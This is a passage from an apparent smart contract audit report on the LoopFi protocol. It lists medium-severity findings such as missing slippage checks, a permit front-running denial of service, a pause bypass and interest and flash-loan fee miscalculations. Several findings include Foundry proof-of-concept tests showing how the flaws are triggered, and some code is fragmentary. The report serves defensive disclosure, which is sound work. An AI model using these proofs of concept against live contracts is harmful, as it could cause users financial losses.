calculates shares based on 10,000 total assets.- Unclaimed rewards of 500 are not included, leading to an incorrect share calculation.
- User calls
User mints shares:
- User calls
mint(100, receiver)
. totalAssets()
returns 10,000 (current balance in reward pool).previewMint(100)
calculates assets based on 10,000 total assets.- Unclaimed rewards of 500 are not included, leading to an incorrect asset calculation.
- User calls
User withdraws assets:
- User calls
withdraw(1000, receiver, owner)
. totalAssets()
returns 10,000 (current balance in reward pool).previewWithdraw(1000)
calculates shares based on 10,000 total assets.- Unclaimed rewards of 500 are not included, leading to an incorrect share calculation.
- User calls
User redeems shares:
- User calls
redeem(100, receiver, owner)
. totalAssets()
returns 10,000 (current balance in reward pool).previewRedeem(100)
calculates assets based on 10,000 total assets.- Unclaimed rewards of 500 are not included, leading to an incorrect asset calculation.
- User calls
Tools Used
Manual review
Recommended Mitigation Steps
To fix this issue, include unclaimed rewards in the totalAssets()
function totalAssets() public view virtual override(IERC4626, ERC4626) returns (uint256) {
- return IPool(rewardPool).balanceOf(address(this));
+ uint256 unclaimedRewards = IPool(rewardPool).earned(address(this));
+ return IPool(rewardPool).balanceOf(address(this)) + unclaimedRewards;
This ensures that the shares and assets are correctly calculated in the deposit()
, mint()
, withdraw()
, and redeem()
amarcu (LoopFi) acknowledged and commented:
Acknowledged, but we will remove and not use the AuraVault.
[M-13] Lack of Slippage Control in AuraVault::deposit
and AuraVault::mint
Functions Can Lead to Unexpected Financial Losses for Users
Submitted by Agontuk, also found by Bauchibred, minglei-wang-3570, and crypticdefense
The AuraVault
contract implements ERC-4626 vault functionality, allowing users to deposit assets and mint shares. However, the deposit
and mint
functions lack slippage controls, which can result in users receiving fewer shares or sending more assets than expected. This issue is similar to a previously reported bug in the bHermes
contract, where the absence of slippage controls in the ERC4626DepositOnly.deposit
and ERC4626DepositOnly.mint
functions led to unexpected outcomes for users.
Detailed Description
The AuraVault
contract is designed to manage assets and distribute rewards from an Aura RewardsPool
. It includes functions for depositing assets and minting shares, which are critical for users interacting with the vault. However, these functions do not allow users to specify slippage parameters, exposing them to potential financial losses.
The deposit
function allows users to deposit a specified amount of assets and receive shares in return. The function calculates the number of shares to be minted using the previewDeposit
function and then proceeds with the deposit. However, it does not allow users to specify a minimum number of shares to be minted, which can lead to slippage issues.
File: AuraVault.sol
199: function deposit(uint256 assets, address receiver) public virtual override(IERC4626, ERC4626) returns (uint256) {
200: uint256 shares = previewDeposit(assets);
201: _deposit(_msgSender(), receiver, assets, shares);
203: // Deposit in reward pool
204: IERC20(asset()).safeApprove(rewardPool, assets);
205: IPool(rewardPool).deposit(assets, address(this));
207: return shares;
208: }
The mint
function allows users to mint a specified number of shares by depositing the required amount of assets. The function calculates the required assets using the previewMint
function and then proceeds with the minting. However, it does not allow users to specify a maximum number of assets to be sent, which can lead to slippage issues.
File: AuraVault.sol
216: function mint(uint256 shares, address receiver) public virtual override(IERC4626, ERC4626) returns (uint256) {
217: uint256 assets = previewMint(shares);
218: _deposit(_msgSender(), receiver, assets, shares);
220: // Deposit assets in reward pool
221: IERC20(asset()).safeApprove(rewardPool, assets);
222: IPool(rewardPool).deposit(assets, address(this));
224: return assets;
225: }
Root Cause
The root cause of the issue is the absence of slippage control parameters in the deposit
and mint
functions. Users cannot specify minimum shares to be minted or maximum assets to be sent, leading to potential financial losses due to slippage.
Users can lose funds due to unexpected slippage when interacting with the AuraVault
contract. Specifically, they may receive fewer shares than expected when depositing assets or send more assets than expected when minting shares. This can result in significant financial losses, especially in volatile market conditions.
Proof of Concept
- Alice wants to deposit 1000 units of an asset into the
contract and expects to receive at least 100 shares. - Alice calls the
function with 1000 units of the asset. - Due to slippage, Alice receives only 90 shares instead of the expected 100 shares.
- Alice loses value because she received fewer shares than expected.
Similarly, for the mint
- Bob wants to mint 100 shares and expects to send no more than 1000 units of the asset.
- Bob calls the
function with 100 shares as the input. - Due to slippage, Bob ends up sending 1200 units of the asset instead of the expected 1000 units.
- Bob loses value because he sent more assets than expected.
Recommended Mitigation Steps
Add slippage control parameters to the deposit
and mint
functions to allow users to specify minimum shares to be minted and maximum assets to be sent. This will ensure that transactions revert if the slippage conditions are not met.
- function deposit(uint256 assets, address receiver) public virtual override(IERC4626, ERC4626) returns (uint256) {
+ function deposit(uint256 assets, uint256 minShares, address receiver) public virtual override(IERC4626, ERC4626) returns (uint256) {
uint256 shares = previewDeposit(assets);
+ require(shares >= minShares, "AuraVault: Insufficient shares minted");
_deposit(_msgSender(), receiver, assets, shares);
// Deposit in reward pool
IERC20(asset()).safeApprove(rewardPool, assets);
IPool(rewardPool).deposit(assets, address(this));
return shares;
- function mint(uint256 shares, address receiver) public virtual override(IERC4626, ERC4626) returns (uint256) {
+ function mint(uint256 shares, uint256 maxAssets, address receiver) public virtual override(IERC4626, ERC4626) returns (uint256) {
uint256 assets = previewMint(shares);
+ require(assets <= maxAssets, "AuraVault: Excessive assets required");
_deposit(_msgSender(), receiver, assets, shares);
// Deposit assets in reward pool
IERC20(asset()).safeApprove(rewardPool, assets);
IPool(rewardPool).deposit(assets, address(this));
return assets;
These changes allow users to specify their slippage tolerance, protecting them from unexpected losses due to market volatility or delayed transaction execution.
amarcu (LoopFi) acknowledged and commented:
Acknowledged, but we will remove and not use the AuraVault.
EIP4626 encourage to add slippage protection by adding additional functions which doesn’t violate it.
If implementors intend to support EOA account access directly, they should consider adding an additional function call for deposit/mint/withdraw/redeem with the means to accommodate slippage loss or unexpected deposit/withdrawal limits, since they have no other means to revert the transaction if the exact output amount is not achieved.
Note: For full discussion, see here.
[M-14] DOS attack to SwapAction.transferAndSwap()
when using an ERC20 permit transferFrom
Submitted by chaduke, also found by minglei-wang-3570, Infect3d, zhaojohnson (1, 2), 0xINFINITY (1, 2), Spearmint, 0xbepresent, pks_, petarP1998, Anirruth, and pkqs90
will perform a _transferFrom
to transfer the input tokens to the user proxy and then perform a swap via a router. When it uses an ERC20 permit transferFrom
, an attacker can extract the v, r, s
from the safePermit()
call and frontruns it with a direct safePermit()
with the same arguments. As a result, SwapAction.transferAndSwap()
will fail due to the advancing of nonce. Effectively, this is a DOS attack.
Proof of Concept
First, SwapAction.transferAndSwap()
will perform a _transferFrom
to transfer the input tokens to the user proxy and then perform a swap via a router.
Second, _transferFrom
has three cases: permit2
, permit
or standard transferFrom
The vulnerability lies in the second case, there are two parts:
- Call
; - Call
The first component will set the proper allowance when successful. The problem is that an attacker can observe the mempool and extract the v, r, s
from the safePermit()
call and frontruns it with a direct safePermit()
with the same arguments. As a result, the _transferFrom
and thus SwapAction.transferAndSwap()
will fail due to the advancement of the nonce.
This permit DOS attack has been reported by Immunifi earlier.
The following POC confirms the finding:
- We simulate the front-running by calling
right before the call ofuserProxy.execute()
. - The result shows we have the right allowance but
fails due to wrong verification of signature since the nonce has increased by 1.
Run forge test --match-test testSwapDOS -vv
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.19;
import {Test} from "forge-std/Test.sol";
import "forge-std/console2.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
import {IERC20Permit} from "@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
import {PRBProxyRegistry} from "prb-proxy/PRBProxyRegistry.sol";
import {PRBProxy} from "prb-proxy/PRBProxy.sol";
import {ISignatureTransfer} from "permit2/interfaces/ISignatureTransfer.sol";
import {IUniswapV3Router, decodeLastToken, UniswapV3Router_decodeLastToken_invalidPath} from "../../vendor/IUniswapV3Router.sol";
import {IVault as IBalancerVault} from "../../vendor/IBalancerVault.sol";
import {PermitMaker} from "../utils/PermitMaker.sol";
import {ApprovalType, PermitParams} from "../../proxy/TransferAction.sol";
import {SwapAction, SwapParams, SwapType, SwapProtocol} from "../../proxy/SwapAction.sol";
import {IPActionAddRemoveLiqV3} from "pendle/interfaces/IPActionAddRemoveLiqV3.sol";
contract SwapActionTest is Test {
using SafeERC20 for ERC20;
using SafeERC20 for IERC20Permit;
SwapAction internal swapAction;
// user and permit2 related variables
PRBProxy internal userProxy;
PRBProxy internal bobProxy;
uint256 internal userPk;
address internal user;
address Bob = makeAddr("Bob");
uint256 internal constant NONCE = 0;
// swap protocols
address internal constant ONE_INCH = 0x1111111254EEB25477B68fb85Ed929f73A960582;
address internal constant BALANCER_VAULT = 0xBA12222222228d8Ba445958a75a0704d566BF2C8;
address internal constant UNISWAP_V3 = 0xE592427A0AEce92De3Edee1F18E0157C05861564;
address internal constant PENDLE_ROUTER= 0x00000000005BBB0EF59571E58418F9a4357b68A0;
// Permit2
ISignatureTransfer internal constant permit2 = ISignatureTransfer(0x000000000022D473030F116dDEE9F6B43aC78BA3);
// https://etherscan.io/address/0x000000000022d473030f116ddee9f6b43ac78ba3#code
// tokens
ERC20 internal constant DAI = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);
ERC20 internal constant USDC = ERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
ERC20 internal constant WETH = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
ERC20 internal constant BOND = ERC20(0x0391D2021f89DC339F60Fff84546EA23E337750f);
ERC20 internal constant BAL = ERC20(0xba100000625a3754423978a60c9317c58a424e3D);
// Chainlink oracles
IPriceFeed internal constant DAI_ETH_FEED = IPriceFeed(0x773616E4d11A78F511299002da57A0a94577F1f4); // DAI:ETH
IPriceFeed internal constant USDC_ETH_FEED = IPriceFeed(0x986b5E1e1755e3C2440e960477f25201B0a8bbD4); // USDC:ETH
IPriceFeed internal constant BAL_USD_FEED = IPriceFeed(0xdF2917806E30300537aEB49A7663062F4d1F2b5F); // BAL:USD
// uni v3
IUniswapV3Router univ3Router = IUniswapV3Router(UNISWAP_V3);
bytes internal constant DAI_USDC_PATH = abi.encodePacked(address(DAI), uint24(100), address(USDC));
bytes internal constant DAI_WETH_BOND_PATH =
abi.encodePacked(address(DAI), uint24(3000), address(WETH), uint24(3000), address(BOND));
bytes internal constant DAI_WETH_USDC_PATH =
abi.encodePacked(address(DAI), uint24(3000), address(WETH), uint24(3000), address(USDC));
// Balancer
bytes32 internal constant wethDaiPoolId = 0x0b09dea16768f0799065c475be02919503cb2a3500020000000000000000001a;
bytes32 internal constant balWethPoolId = 0x5c6ee304399dbdb9c8ef030ab642b10820db8f56000200000000000000000014;
// USDC, DAI, USDT StablePool
bytes32 internal constant balancerStablePoolId = 0x06df3b2bbb68adc8b0e302443692037ed9f91b42000000000000000000000063;
IBalancerVault internal constant balancerVault = IBalancerVault(BALANCER_VAULT);
function setUp() public {
vm.createSelectFork(vm.rpcUrl("mainnet"), 17055414); // 15/04/2023 20:43:00 UTC
swapAction = new SwapAction(balancerVault, univ3Router, IPActionAddRemoveLiqV3(PENDLE_ROUTER));
userPk = 0x12341234;
user = vm.addr(userPk);
PRBProxyRegistry prbProxyRegistry = new PRBProxyRegistry(); // 1
userProxy = PRBProxy(payable(address(prbProxyRegistry.deployFor(user))));
console2.log("a userProxy has been created for user: ", address(userProxy));
bobProxy = PRBProxy(payable(address(prbProxyRegistry.deployFor(Bob))));
console2.log("a userProxy has been created for Bob: ", address(bobProxy));
// set allowance for permit2 transfers
DAI.approve(address(permit2), type(uint256).max); // permi2 will verify signature and move funds
USDC.approve(address(permit2), type(uint256).max); // everybody gives permit2 approval first, and then enforce security via permit2
DAI.approve(address(permit2), type(uint256).max); // permi2 will verify signature and move funds
USDC.approve(address(permit2), type(uint256).max); // everybody gives permit2 approval first, and then enforce security via permit2
vm.label(address(WETH), "WETH");
vm.label(address(USDC), "USDC");
vm.label(address(DAI), "DAI");
vm.label(address(BOND), "BOND");
vm.label(address(permit2), "permit2");
vm.label(address(userProxy), "userProxy");
vm.label(address(user), "user");
function printBalances(address a, string memory name) public{
console2.log("\n =================================================");
console2.log("Balances for ", name);
console2.log("DAI balance: ", DAI.balanceOf(a));
console2.log("USDC token balance: ", USDC.balanceOf(a));
console2.log("BOND token balance: ", BOND.balanceOf(a));
console2.log("=================================================\n ");
function testSwapDOS() public {
console2.log("\n \n swap3---------------------------------------------"); // usdc -> DAI
uint256 amountOut = 1_000 * 1e18; // amount out of DAI we expect
uint256 amountInMax = (amountOut * 102) / 100e12; // allow 2% slippage
deal(address(USDC), user, amountInMax);
printBalances(user, "user");
// get permit signature
uint256 deadline = block.timestamp + 100;
(uint8 v, bytes32 r, bytes32 s) = PermitMaker.getPermitTransferFromSignature(
address(userProxy), // spender of the permit
amountInMax, // approval amount
PermitParams memory permitParams = PermitParams({
approvalType: ApprovalType.PERMIT,
approvalAmount: amountInMax,
nonce: NONCE,
deadline: deadline,
v: v,
r: r,
s: s
// construct swap params
SwapParams memory swapParams = SwapParams({
swapProtocol: SwapProtocol.UNIV3,
swapType: SwapType.EXACT_OUT,
assetIn: address(USDC),
amount: amountOut,
limit: amountInMax,
recipient: user,
deadline: deadline,
console2.log("user: ", user);
console2.log("userProxy: ", address(userProxy));
console2.log("approvalAmount: ", amountInMax);
console2.log("deadline: ", deadline);
console2.log("allowance: ", USDC.allowance(user, address(userProxy)));
console2.log("USDC: ", address(USDC));
// simulate front-running of calling safePermit()
address(userProxy), // spender
console2.log("allowance: ", USDC.allowance(user, address(userProxy)));
vm.expectRevert("EIP2612: invalid signature");
bytes memory response = userProxy.execute(
abi.encodeWithSelector(swapAction.transferAndSwap.selector, user, permitParams, swapParams)
// uint256 amountIn = abi.decode(response, (uint256));
Tools Used
Recommended Mitigation Steps
Change the logic to either there is sufficient allowance or the safePermit
succeeds using a try-catch clause:
function _transferFrom(
address token,
address from,
address to,
uint256 amount,
PermitParams memory params
) internal {
if (params.approvalType == ApprovalType.PERMIT2) {
// Consume a permit2 message and transfer tokens.
permitted: ISignatureTransfer.TokenPermissions({token: token, amount: params.approvalAmount}),
nonce: params.nonce,
deadline: params.deadline
ISignatureTransfer.SignatureTransferDetails({to: to, requestedAmount: amount}),
bytes.concat(params.r, params.s, bytes1(params.v)) // Construct signature
} else if (params.approvalType == ApprovalType.PERMIT) {
// Consume a standard ERC20 permit message
if(IERC20(token).allowance(from, to) < params.approvalAmount)
revert("not enough allowance");
IERC20(token).safeTransferFrom(from, to, amount);
} else {
// No signature provided, just transfer tokens.
IERC20(token).safeTransferFrom(from, to, amount);
Assessed type
amarcu (LoopFi) acknowledged and commented:
The transfer action also supports regular transfers, so if a user is constantly getting frontrun we can skip the permit and use the regular allowance/transfer flow. There is no reason to add the fallback mechanism for the allowance check because if we had that in the first place we could skip permits altogether. Also making the allowance mandatory makes permit calls redundant.
[M-15] WhenNotPaused
modifier in the CDPVault can be bypassed by users
Submitted by Kaysoft, also found by Afriauditor (1, 2), chaduke, 0xAlix2, boraichodrunkenmaster, ElCid, Spearmint, josephxander, Centaur, zhaojohnson, Bigsam, peanuts, yashar, Inspecktor, ak1, hash, pkqs90, zxriptor, JanuaryPersimmon2024, and ustas
Users can still execute deposit and withdraw functions when the CDPVault.sol is paused as against the design expectation by just calling the modifyCollateralAndDebt(...)
function with the necessary parameters.
Proof of Concept
By design it is expected that when the CDPVault.sol contract is paused by the Dao, the deposits and withdrawals cannot be made due to the whenNotPaused
modifier on the deposit
and withdraw
functions. However, the pause mechanism can be bypassed by users to deposit or withdraw on the CDPVault contract by directly calling the modifyCollateralAndDebt(...)
function since it is public since it is the same function that is called by the deposit
and withdraw
Both the deposit and withdraw functions of the CDPVault.sol only make simple calculations before calling the public modifyCollateralAndDebt(...)
function. This allows any user to directly call the modifyCollateralAndDebt(...)
function when the CDPVault.sol contract is paused.
File: CDPVault.sol
function deposit(address to, uint256 amount) external whenNotPaused returns (uint256 tokenAmount) {
tokenAmount = wdiv(amount, tokenScale);
int256 deltaCollateral = toInt256(tokenAmount);
@> modifyCollateralAndDebt({
owner: to,
collateralizer: msg.sender,
creditor: msg.sender,
deltaCollateral: deltaCollateral,
deltaDebt: 0
function withdraw(address to, uint256 amount) external whenNotPaused returns (uint256 tokenAmount) {
tokenAmount = wdiv(amount, tokenScale);
int256 deltaCollateral = -toInt256(tokenAmount);
@> modifyCollateralAndDebt({
owner: to,
collateralizer: msg.sender,
creditor: msg.sender,
deltaCollateral: deltaCollateral,
deltaDebt: 0
function modifyCollateralAndDebt(
address owner,
address collateralizer,
address creditor,
int256 deltaCollateral,
int256 deltaDebt
) public {
Recommended Mitigation Steps
Consider implementing either of the two solutions:
- Make the
instead ofpublic
, or - Add the
modifier to themodifyCollateralAndDebt(...)
[M-16] Incorrect calculation of newCumulativeIndex
in function calcDecrease
Submitted by hearmen, also found by boraichodrunkenmaster, emerald7017, chaduke, 0xBugSlayer, thisvishalsingh, joaovwfreire, 0xpiken, Chinmay, hash, and pkqs90
In the contract CDPVault.sol
, the function calcDecrease
calculates newCumulativeIndex
in line 703 when amountToRepay < interestAccrued
with profit
which is:
newCumulativeIndex =
(INDEX_PRECISION * cumulativeIndexNow * cumulativeIndexLastUpdate) /
cumulativeIndexNow -
(INDEX_PRECISION * profit * cumulativeIndexLastUpdate) /
debt); // U:[CL-3]
However, the profit
contains the cumulativeQuotaInterest
, so it can not be used to calculate newCumulativeIndex
if (amountToRepay >= cumulativeQuotaInterest) {
amountToRepay -= cumulativeQuotaInterest; // U:[CL-3]
profit += cumulativeQuotaInterest; // U:[CL-3]
newCumulativeQuotaInterest = 0; // U:[CL-3]
For example, when the left amountToRepay
can cover the interestAccrued
, the newCumulativeIndex
should be cumulativeIndexNow
as in line 692, because: interestAccrued
== (debt * cumulativeIndexNow) / cumulativeIndexLastUpdate - debt
if (amountToRepay >= interestAccrued) {
amountToRepay -= interestAccrued;
profit += interestAccrued;
newCumulativeIndex = cumulativeIndexNow;
However, when the left amountToRepay = interestAccrued - 1
, and profit
will be cumulativeQuotaInterest+interestAccrued - 1
. The calculation of newCumulativeIndex
will be larger than cumulativeIndexNow
because the cumulativeQuotaInterest+interestAccrued - 1
will be larger than interestAccrued
which is totally wrong, since it exceeds the limit
newCumulativeIndex =
(INDEX_PRECISION * cumulativeIndexNow * cumulativeIndexLastUpdate) /
cumulativeIndexNow -
(INDEX_PRECISION * profit * cumulativeIndexLastUpdate) /
debt); // U:[CL-3]
will be updated with incorrect newCumulativeIndex
and less interest accrued will be charged from users. The position which should be liquidated will not be liquidated due the the wrong Position.cumulativeIndexLastUpdate
Proof of Concept
Paste this test in CDPVault.t.sol:
function test_calcDecrese_poc() public {
//CDPVault vault = createCDPVault(token, 150 ether, 0, 1.25 ether, 1.0 ether, 0);
CDPVault vault = createCDPVault(token, 150 ether, 0, 1.25 ether, 1 ether, 0.95 ether);
// create position
token.mint(address(this), 1000 ether);
token.approve(address(vault), 100 ether);
vault.modifyCollateralAndDebt(address(this), address(this), address(this), 100 ether, 70 ether);
vm.warp(block.timestamp + 865 days);
(, uint256 totalInterest, ) = vault.getDebtInfo(address(this));
mockWETH.mint(address(this), 500 ether);
mockWETH.approve(address(vault), 200 ether);
int256 repayAmount = -(int256(totalInterest - 1));
vault.modifyCollateralAndDebt(address(this), address(this), address(this), 0, repayAmount);
(,,,uint256 cumulativeIndexLastUpdate,, ) = vault.positions(address(this));
uint256 cumulativeIndexNow = liquidityPool.baseInterestIndex();
The poc result will be:
cumulativeIndexLastUpdate 1242341891861284810269427100
cumulativeIndexNow 1239397711761394368218295007
… which is wrong.
Recommended Mitigation Steps
Use the code as below:
else {
// If amount is not enough to repay interest, then send all to the stakers and update index
profit += amountToRepay; // U:[CL-3]
newCumulativeIndex =
(INDEX_PRECISION * cumulativeIndexNow * cumulativeIndexLastUpdate) /
cumulativeIndexNow -
(INDEX_PRECISION * amountToRepay * cumulativeIndexLastUpdate) /
debt); // U:[CL-3]
amountToRepay = 0; // U:[CL-3]
Assessed type
0xtj24 (LoopFi) confirmed and commented:
[M-17] PositionAction.decreaseLever()
fails to consider the loan fee in Flashlender when calculating loanAmount
, as a result, the functionality will not work when protocolFee != 0
Submitted by chaduke, also found by 0xAlix2, 13u9, zhaojohnson, lian886, lanrebayode77, Nyx, 0xbepresent, 0xpiken, 0xc0ffEE, gumgumzum, hash, pkqs90, and nnez
allows one to decrease the leverage for a position by doing the following:
- Perform a
to loanloanAmount
of underlying tokens; - Perform a
to reduce the debt of the position byloanAmount
. - Withdraw collateral from the position in the amount of
. - Swap the withdrawn collateral to underlying tokens with the exact output amount of
leverParams.primarySwap.amount = loanAmount + fee
using input collateral in the amount ofswapAmountIn
. - The remainng collateral
withdrawnCollateral - swapAmountIn
is either sent to theresidualRecipient
or swap to the specified tokens and sent to the receiver. - Return the loan
loanAmount + protocolFee
back to the pool.
The first problem lies in PositionAction.increaseLever()
: loanAmount
uses leverParams.primarySwap.amount
, it does not consider the protocol fee. leverParams.primarySwap.amount
is the amount of underlying tokens that needs to be swapped out that will be returned back to the pool, which includes the protocol fee. In other words, the correct formula is loanAmount = leverParams.primarySwap.amount - fee
Meanwhile, function positionAction.onCreditFlashLoan()
has a similar problem:
, the debt to be reduced from the position should be the same asloanAmount
, which isleverParams.primarySwap.amount - fee
. However, the function usesleverParams.primarySwap.amount
, which is wrong.
In summary, both functions do not consider the impact of protcolFee
, as a result, these functions will fail.
- In
, change the following line to make protcolFee = 1%:
flashlender = new Flashlender(IPoolV3(address(liquidityPool)), 0.01 ether); // 1/100 fee
- Run
forge test --match-test testDecreaseLever1 -vv
. (It will revert due to insufficient allowance/balance). - When we revised the two functions as follows, everything run smoothly with the correct numbers for all parties.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.19;
import "forge-std/console2.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {PRBProxy} from "prb-proxy/PRBProxy.sol";
import {IntegrationTestBase} from "./IntegrationTestBase.sol";
import {wdiv, WAD} from "../../utils/Math.sol";
import {Permission} from "../../utils/Permission.sol";
import {CDPVault} from "../../CDPVault.sol";
import {PermitParams} from "../../proxy/TransferAction.sol";
import {SwapAction, SwapParams, SwapType, SwapProtocol} from "../../proxy/SwapAction.sol";
import {LeverParams, PositionAction} from "../../proxy/PositionAction.sol";
import {PoolActionParams} from "../../proxy/PoolAction.sol";
import {PositionAction20} from "../../proxy/PositionAction20.sol";
contract PositionAction20_Lever_Test is IntegrationTestBase {
using SafeERC20 for ERC20;
// user
PRBProxy userProxy;
address user;
uint256 constant userPk = 0x12341234;
address Bob = makeAddr("Bob");
CDPVault vault;
// actions
PositionAction20 positionAction;
// common variables as state variables to help with stack too deep
PermitParams emptyPermitParams;
SwapParams emptySwap;
PoolActionParams emptyPoolActionParams;
bytes32[] weightedPoolIdArray;
function setUp() public override {
// configure permissions and system settings
setGlobalDebtCeiling(15_000_000 ether);
// deploy vault
vault = createCDPVault(
token, // token
5_000_000 ether, // debt ceiling
0, // debt floor
1.25 ether, // liquidation ratio
1.0 ether, // liquidation penalty
1.05 ether // liquidation discount
// setup user and userProxy
user = vm.addr(0x12341234);
userProxy = PRBProxy(payable(address(prbProxyRegistry.deployFor(user))));
token.approve(address(user), type(uint256).max);
mockWETH.approve(address(user), type(uint256).max);
// deploy actions
positionAction = new PositionAction20(
// configure oracle spot prices
oracle.updateSpot(address(token), 1 ether);
vm.label(address(userProxy), "UserProxy");
vm.label(address(user), "User");
vm.label(address(vault), "CDPVault");
vm.label(address(positionAction), "PositionAction");
function printPosition(CDPVault v, address p, string memory name) public{
console2.log("\n =================================================");
console2.log("position infor for ", name);
(uint256 collateral, // [wad]
uint256 debt, // [wad]
uint256 lastDebtUpdate, // [timestamp]
uint256 cumulativeIndexLastUpdate,
uint192 cumulativeQuotaIndexLU,
uint128 cumulativeQuotaInterest
) = v.positions(p);
console2.log("collateral: ", collateral);
console2.log("debt: ", debt);
console2.log("cumulativeQuotaInterest: ", cumulativeQuotaInterest);
console2.log("lastUpdate: ", lastDebtUpdate);
console2.log("cumulativeIndexLastUpdate:", cumulativeIndexLastUpdate);
console2.log("cumulativeQuotaIndexLU: ", cumulativeQuotaIndexLU);
console2.log("=================================================\n ");
// simple helper function to increase lever
function _increaseLever( // 111111111111111
PRBProxy proxy,
CDPVault vault_,
uint256 upFrontUnderliers,
uint256 amountToLever,
uint256 amountToLeverLimit
) public returns (uint256 expectedAmountIn) {
LeverParams memory leverParams;
address upFrontToken = address(vault_.token());
address[] memory assets = new address[](2);
assets[0] = address(underlyingToken);
assets[1] = address(upFrontToken);
// mint directly to swap actions for simplicity
if (upFrontUnderliers > 0) deal(upFrontToken, address(proxy), upFrontUnderliers); // upfront collateral
leverParams = LeverParams({
position: address(proxy),
vault: address(vault_),
collateralToken: address(vault_.token()),
primarySwap: SwapParams({
swapProtocol: SwapProtocol.BALANCER,
swapType: SwapType.EXACT_IN,
assetIn: address(underlyingToken),
amount: amountToLever, // amount of stablecoin to swap in // amount of flashload undelrying tokens
limit: amountToLeverLimit, // min amount of tokens to receive // amount of flashloaded colalteral limit
recipient: address(positionAction),
deadline: block.timestamp + 100,
args: abi.encode(weightedPoolIdArray, assets)
auxSwap: emptySwap, // no aux swap
auxAction: emptyPoolActionParams
expectedAmountIn = _simulateBalancerSwap(leverParams.primarySwap);
function testDecreaseLever1() public { // 22222222222222222222222
// create 1st position (this is the user that will lever up the other users position)
address bob = user;
PRBProxy bobProxy = userProxy;
// create 2nd position. This is the user that will be levered up by bob
address alice = vm.addr(0x56785678);
PRBProxy aliceProxy = PRBProxy(payable(address(prbProxyRegistry.deployFor(alice))));
// create alice's initial position
20_000 ether, // upFrontUnderliers
40_000 ether, // borrowAmount
39_000 ether // amountOutMin
(uint256 initialCollateral, uint256 initialNormalDebt, , , , ) = vault.positions(address(aliceProxy));
printPosition(vault, address(aliceProxy), "AliceProxy"); // 79,000 / 40,000
uint256 amountOut = 5_000 ether; // this is the loan + fee
uint256 maxAmountIn = 5_100 ether;
LeverParams memory leverParams;
// now decrease alice's leverage as bob
address[] memory assets = new address[](2);
assets[0] = address(underlyingToken);
assets[1] = address(token);
leverParams = LeverParams({
position: address(aliceProxy),
vault: address(vault),
collateralToken: address(token),
primarySwap: SwapParams({
swapProtocol: SwapProtocol.BALANCER,
swapType: SwapType.EXACT_OUT,
assetIn: address(token), // swap collteral tokens for underlying toksn to return back to flashCreditloan
amount: amountOut, // ????
limit: maxAmountIn,
recipient: address(positionAction),
deadline: block.timestamp + 100,
args: abi.encode(weightedPoolIdArray, assets)
auxSwap: emptySwap,
auxAction: emptyPoolActionParams
// call setPermissionAgent as alice to allow bob to modify alice's position
vault.setPermissionAgent(address(bobProxy), true);
// now call decreaseLever on alice's position as bob and expect success because alice gave bob permission
abi.encodeWithSelector(positionAction.decreaseLever.selector, leverParams, maxAmountIn, address(bob))
printPosition(vault, address(aliceProxy), "AliceProxy");
Tools Used
Recommended Mitigation Steps
Correct the two functions as follows, focusing on calculating the correct loanAmount
and subDebt
and returnAmount
function decreaseLever(
LeverParams calldata leverParams,
uint256 subCollateral,
address residualRecipient
) external onlyDelegatecall {
// validate the primary swap
if (leverParams.primarySwap.swapType != SwapType.EXACT_OUT || leverParams.primarySwap.recipient != self)
revert PositionAction__decreaseLever_invalidPrimarySwap();
// validate aux swap if it exists
if (leverParams.auxSwap.assetIn != address(0) && (leverParams.auxSwap.swapType != SwapType.EXACT_IN))
revert PositionAction__decreaseLever_invalidAuxSwap();
/// validate residual recipient is provided if no aux swap is provided
if (leverParams.auxSwap.assetIn == address(0) && residualRecipient == address(0))
revert PositionAction__decreaseLever_invalidResidualRecipient();
// take out credit flash loan
IPermission(leverParams.vault).modifyPermission(leverParams.position, self, true);
uint protocolFee = flashlender.protocolFee();
// loanAmount (WAD + protocolFee)/WAD = leverParams.primarySwap.amount
uint loanAmount = leverParams.primarySwap.amount * (10**18) / (10**18 + protocolFee); // loanamount should be smaller
abi.encode(leverParams, subCollateral, residualRecipient)
IPermission(leverParams.vault).modifyPermission(leverParams.position, self, false);
function onCreditFlashLoan(
address /*initiator*/,
uint256 /*amount*/,
uint256 /*fee*/,
bytes calldata data
) external returns (bytes32) {
if (msg.sender != address(flashlender)) revert PositionAction__onCreditFlashLoan__invalidSender();
LeverParams memory leverParams,
uint256 subCollateral,
address residualRecipient
) = abi.decode(data,(LeverParams, uint256, address));
uint protocolFee = flashlender.protocolFee();
// loanAmount (WAD + protocolFee)/WAD = leverParams.primarySwap.amount
uint loanAmount = leverParams.primarySwap.amount * (10**18) / (10**18 + protocolFee); // loanamount should be smaller
underlyingToken.forceApprove(address(leverParams.vault), loanAmount); // // should be equal to loanAmount
// sub collateral and debt
-toInt256(loanAmount) // should be equal to loanAmount
// withdraw collateral and handle any CDP specific actions
uint256 withdrawnCollateral = _onDecreaseLever(leverParams, subCollateral);
bytes memory swapData = _delegateCall(
uint256 swapAmountIn = abi.decode(swapData, (uint256));
// swap collateral to stablecoin and calculate the amount leftover
uint256 residualAmount = withdrawnCollateral - swapAmountIn;
// send left over collateral that was not needed to payback the flash loan to `residualRecipient`
if (residualAmount > 0) {
// perform swap from collateral to arbitrary token if necessary
if (leverParams.auxSwap.assetIn != address(0)) {
} else {
// otherwise just send the collateral to `residualRecipient`
IERC20(leverParams.primarySwap.assetIn).safeTransfer(residualRecipient, residualAmount);
underlyingToken.forceApprove(address(flashlender), leverParams.primarySwap.amount); // returnAmoutn is the output amount of the swap
Assessed type
[M-18] In CDPVault::liquidatePositionBadDebt()
, the calculation of loss
is incorrect
Submitted by lian886, also found by lanrebayode77, crypticdefense, 0xpiken, and hash
The incorrect calculation affects the protocol’s profit assessment, resulting in potential losses for users, particularly in the interest portion.
Proof of Concept
